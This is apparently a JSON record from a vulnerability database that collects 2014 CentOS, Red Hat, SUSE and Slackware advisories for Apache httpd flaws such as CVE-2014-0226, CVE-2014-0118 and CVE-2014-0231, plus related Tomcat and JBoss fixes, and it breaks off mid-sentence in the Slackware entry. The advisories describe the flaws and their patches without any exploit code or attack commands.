"centos": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:0920\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020440.html\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020441.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0920.html", "modified": "2014-07-23T15:13:08", "published": "2014-07-23T15:12:33", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/020440.html", "id": "CESA-2014:0920", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:43", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2014:0921\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-July/020442.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\n", "modified": "2014-07-23T15:36:55", "published": "2014-07-23T15:36:55", "href": "http://lists.centos.org/pipermail/centos-announce/2014-July/020442.html", "id": "CESA-2014:0921", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:40", "bulletinFamily": "unix", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-06T20:24:08", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0920", "href": "https://access.redhat.com/errata/RHSA-2014:0920", "type": "redhat", "title": "(RHSA-2014:0920) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:30", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 6\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.", "modified": "2018-06-07T02:42:48", "published": "2014-08-21T19:24:12", "id": "RHSA-2014:1087", "href": "https://access.redhat.com/errata/RHSA-2014:1087", "type": "redhat", "title": "(RHSA-2014:1087) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:45", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 5 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2016-04-04T18:31:13", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1019", "href": "https://access.redhat.com/errata/RHSA-2014:1019", "type": "redhat", "title": "(RHSA-2014:1019) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd24-httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-06-13T01:28:21", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0922", "href": "https://access.redhat.com/errata/RHSA-2014:0922", "type": "redhat", "title": "(RHSA-2014:0922) Important: httpd24-httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient,\nand extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA NULL pointer dereference flaw was found in the mod_cache httpd module.\nA malicious HTTP server could cause the httpd child process to crash when\nthe Apache HTTP Server was used as a forward proxy with caching.\n(CVE-2013-4352)\n\nA denial of service flaw was found in the mod_proxy httpd module. A remote\nattacker could send a specially crafted request to a server configured as a\nreverse proxy using a threaded Multi-Processing Modules (MPM) that would\ncause the httpd child process to crash. (CVE-2014-0117)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon will be restarted automatically.\n", "modified": "2018-04-12T03:33:37", "published": "2014-07-23T04:00:00", "id": "RHSA-2014:0921", "href": "https://access.redhat.com/errata/RHSA-2014:0921", "type": "redhat", "title": "(RHSA-2014:0921) Important: httpd security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:46", "bulletinFamily": "unix", "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nThis release serves as a replacement for Red Hat JBoss Web Server 2.0.1,\nand includes several bug fixes. Refer to the Red Hat JBoss Web Server 2.1.0\nRelease Notes, linked to in the References section, for information on the\nmost significant of these changes.\n\nThe following security issues are also fixed with this release:\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nIt was found that several application-provided XML files, such as web.xml,\ncontent.xml, *.tld, *.tagx, and *.jspx, resolved external entities,\npermitting XML External Entity (XXE) attacks. An attacker able to deploy\nmalicious applications to Tomcat could use this flaw to circumvent security\nrestrictions set by the JSM, and gain access to sensitive information on\nthe system. Note that this flaw only affected deployments in which Tomcat\nis running applications from untrusted sources, such as in a shared hosting\nenvironment. (CVE-2013-4590)\n\nIt was found that, in certain circumstances, it was possible for a\nmalicious web application to replace the XML parsers used by Tomcat to\nprocess XSLTs for the default servlet, JSP documents, tag library\ndescriptors (TLDs), and tag plug-in configuration files. The injected XML\nparser(s) could then bypass the limits imposed on XML external entities\nand/or gain access to the XML files processed for other web applications\ndeployed on the same Tomcat instance. (CVE-2014-0119)\n\nAll users of Red Hat JBoss Web Server 2.0.1 on Red Hat Enterprise Linux 5\nare advised to upgrade to Red Hat JBoss Web Server 2.1.0. The JBoss server\nprocess must be restarted for this update to take effect.\n", "modified": "2018-08-09T19:46:59", "published": "2014-08-21T04:00:00", "id": "RHSA-2014:1088", "href": "https://access.redhat.com/errata/RHSA-2014:1088", "type": "redhat", "title": "(RHSA-2014:1088) Important: Red Hat JBoss Web Server 2.1.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA race condition flaw, leading to heap-based buffer overflows, was found in\nthe mod_status httpd module. A remote attacker able to access a status page\nserved by mod_status on a server using a threaded Multi-Processing Module\n(MPM) could send a specially crafted request that would cause the httpd\nchild process to crash or, possibly, allow the attacker to execute\narbitrary code with the privileges of the \"apache\" user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate module\nhandled request body decompression (configured via the \"DEFLATE\" input\nfilter). A remote attacker able to send a request whose body would be\ndecompressed could use this flaw to consume an excessive amount of system\nmemory and CPU on the target system. (CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input.\nA remote attacker could submit a specially crafted request that would cause\nthe httpd child process to hang indefinitely. (CVE-2014-0231)\n\nA flaw was found in the WebSocket08FrameDecoder implementation that could\nallow a remote attacker to trigger an Out Of Memory Exception by issuing a\nseries of TextWebSocketFrame and ContinuationWebSocketFrames. Depending on\nthe server configuration, this could lead to a denial of service.\n(CVE-2014-0193)\n\nIt was found that the isCallerInRole() method of the SimpleSecurityManager\ndid not correctly check caller roles. A remote, authenticated attacker\ncould use this flaw to circumvent the caller check in applications that use\nblack list access control based on caller roles. (CVE-2014-3472)\n\nRed Hat would like to thank James Roper of Typesafe for reporting\nCVE-2014-0193, and CA Technologies for reporting CVE-2014-3472.\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. Documentation for these changes will be available\nshortly from the JBoss Enterprise Application Platform 6.3.0 Release Notes,\nlinked to in the References.\n\nAll users who require JBoss Enterprise Application Platform 6.3.0 on Red\nHat Enterprise Linux 6 should install these new packages. The JBoss server\nprocess must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:04", "published": "2014-08-06T04:00:00", "id": "RHSA-2014:1020", "href": "https://access.redhat.com/errata/RHSA-2014:1020", "type": "redhat", "title": "(RHSA-2014:1020) Important: Red Hat JBoss Enterprise Application Platform 6.3.0 update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "description": "apache2:\n - ECC support was added to mod_ssl\n - fix for a race condition in mod_status known as CVE-2014-0226 can lead\n to information disclosure; mod_status is not active by default, and is\n normally only open for connects from localhost.\n - fix for bug known as CVE-2014-0098 that can crash the apache process if\n a specially designed cookie is sent to the server (log_cookie.c)\n - fix for crash bug in mod_dav known as CVE-2013-6438\n - fix for a problem with non-responsive CGI scripts that would otherwise\n cause the server to stall and deny service. CVE-2014-0231, new\n configuration parameter CGIDScriptTimeout defaults to 60s.\n\n apache2-mod_security2:\n - specially drafted chunked http requests allow an attacker to bypass\n filters configured in mod_security2. This vulnerability is known as\n CVE-2013-5705.\n\n", "modified": "2014-08-07T23:04:14", "published": "2014-08-07T23:04:14", "id": "OPENSUSE-SU-2014:0969-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00004.html", "title": "security issues addressed, most notably the mod_security heap overflow known as CVE-2014-0226 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:20:21", "bulletinFamily": "unix", "description": "This apache2 update fixes the following security and non security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "modified": "2014-09-02T19:04:20", "published": "2014-09-02T19:04:20", "id": "SUSE-SU-2014:1080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00000.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "description": "This update for the Apache Web Server provides the following fixes:\n\n * Fixed a heap-based buffer overflow on apache module mod_status.\n (bnc#887765, CVE-2014-0226)\n * Properly remove whitespace characters from CDATA sections to avoid\n remote denial of service by crashing the Apache Server process.\n (bnc#869105, CVE-2013-6438)\n * Correction to parsing of cookie content; this can lead to a crash\n with a specially designed cookie sent to the server. (bnc#869106,\n CVE-2014-0098)\n * ECC support should not be missing. (bnc#859916)\n\n This update also introduces a new configuration parameter\n CGIDScriptTimeout, which defaults to the value of parameter Timeout.\n CGIDScriptTimeout is set to 60s if mod_cgid is loaded/active, via\n /etc/apache2/conf.d/cgid-timeout.conf. The new directive and its effect\n prevent request workers to be eaten until starvation if cgi programs do\n not send output back to the server within the timeout set by\n CGIDScriptTimeout. (bnc#887768, CVE-2014-0231)\n\n Security Issues references:\n\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "modified": "2014-08-07T01:04:17", "published": "2014-08-07T01:04:17", "id": "SUSE-SU-2014:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00003.html", "title": "Security update for the Apache Web Server (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:37:24", "bulletinFamily": "unix", "description": "This apache2 update fixes the following security and non-security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n * apache fails to start with SSL on Xen kernel at boot time\n (bnc#852401)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "modified": "2014-09-02T20:04:23", "published": "2014-09-02T20:04:23", "id": "SUSE-SU-2014:1081-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00001.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:35", "bulletinFamily": "unix", "description": "This apache2 update fixes the following security issues:\n\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_rewrite: escape logdata to avoid terminal escapes\n (CVE-2013-1862, bnc#829057)\n * mod_dav: segfault in merge request (CVE-2013-1896, bnc#829056)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n * CVE-2013-1862\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862</a>>\n * CVE-2013-1896\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896</a>>\n\n\n", "modified": "2014-09-02T21:04:17", "published": "2014-09-02T21:04:17", "id": "SUSE-SU-2014:1082-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00002.html", "title": "Security update for apache2 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:57", "bulletinFamily": "unix", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/httpd-2.4.10-i486-1_slack14.1.txz: Upgraded.\n This update fixes the following security issues:\n *) SECURITY: CVE-2014-0117 (cve.mitre.org)\n mod_proxy: Fix crash in Connection header handling which\n allowed a denial of service attack against a reverse proxy\n with a threaded MPM. [Ben Reser]\n *) SECURITY: CVE-2014-0118 (cve.mitre.org)\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n limits the length and compression ratio of inflated request bodies to\n avoid denial of sevice via highly compressed bodies. See directives\n DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n and DeflateInflateRatioBurst. [Yann Ylavic, Eric Covener]\n *) SECURITY: CVE-2014-0226 (cve.mitre.org)\n Fix a race condition in scoreboard handling, which could lead to\n a heap buffer overflow. [Joe Orton, Eric Covener]\n *) SECURITY: CVE-2014-0231 (cve.mitre.org)\n mod_cgid: Fix a denial of service against CGI scripts that do\n not consume stdin that could lead to lingering HTTPD child processes\n filling up the scoreboard and eventually hanging the server. By\n default, the client I/O timeout (Timeout directive) now applies to\n communication with scripts. The CGIDScriptTimeout directive can be\n used to set a different timeout for communication with scripts.\n [Rainer Jung, Eric Covener, Yann Ylavic]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating 